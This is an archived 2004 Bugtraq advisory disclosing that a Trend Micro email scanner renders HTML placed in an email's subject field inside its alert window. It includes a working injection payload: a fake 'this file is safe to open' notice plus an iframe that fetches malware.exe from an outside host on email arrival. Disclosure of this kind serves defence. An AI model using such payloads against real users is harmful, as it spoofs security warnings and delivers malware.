| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 7 Jun 2004 14:29:45 -0000 From: "http-equiv@...ite.com" <1@...ware.com> To: <bugtraq@...urityfocus.com> Cc: <NTBugtraq@...tserv.ntbugtraq.com> Subject: TREND MICRO: The Protector Becomes The Vector Take II Monday, June 07, 2004 <!-- 1. When the product alerts it creates an html file in the temporary file of the user's machine [the so-called "local zone"] [screen shot: http://www.malware.com/weallcar.png 29KB ] This html file is viewed from an Internet Explorer "browser object" and indicates what file is problematic. --> Further to the examination of this: [see: http://securityfocus.com/archive/1/365050/2004-05-28/2004- 06-03/0 ] It may very well be that alert file while in the temporary folder does not in fact run under the so-called "My Computer" zone. Previous testing required irritatingly precise manual construction of the .zip file with test string therein by the counting off the amount of desired html characters to test against the name of the file in the .zip and manually modifying it accordingly. While the overall html concept and problem is sound as demonstrated, we today find a much easier and default and perhaps even worse problem than before. Incoming Email: The gadget has a scanning mechanism for incoming email messages utilising the exact same alert scheme. In this instance everything is set on default and we need not enclose our "bait" in a container and fiddle for hours with its name. We have a subject and a sender field. In this case we do like so: Your Safe File<div style="position:absolute;top:25;left:10;height:300pt;width:300pt; z-index:+100;font-family:Verdana;font-weight: bold;font-size: 12pt;font-color:green">Trend Micro Internet Security confirms this file <br>malware.exe is safe to open. Proceed.</div><iframe src="http://www.malware.com/malware.exe"> [screen shot: http://www.malware.com/micronot.png 33KB] Which should be self-explanatory of only one possibility. Notes: 1. Using this easier delivery and testing method <object> tag in the subject generates an activex warning plus <script>alert() </script> fails; very strongly suggesting that despite the html file being in the local zone, the developers had the foresight to have their little Internet Explorer control set at the high setting regardless of zoning [might be other reasons including these being email vs. web]. Nevertheless: 2. The whole thing is still broken though as frames and images render as they should. This completely defeats the security of Outlook Express and Outlook which disallow file downloads, external content downloading etc. which this allows on arrival of the email [not even opening it]. 3. Cramming everything into the subject field and modifying warning messages as above, all while on default settings can prove just as lucrative. 4. There is always away around the mighty Internet Explorer's so- called 'Security Zone's if not today, then tomorrow. 5. This html 'thing' in the alert mechanism really ought to be fixed as soon as possible. End Call -- http://www.malware.com
Powered by blists - more mailing lists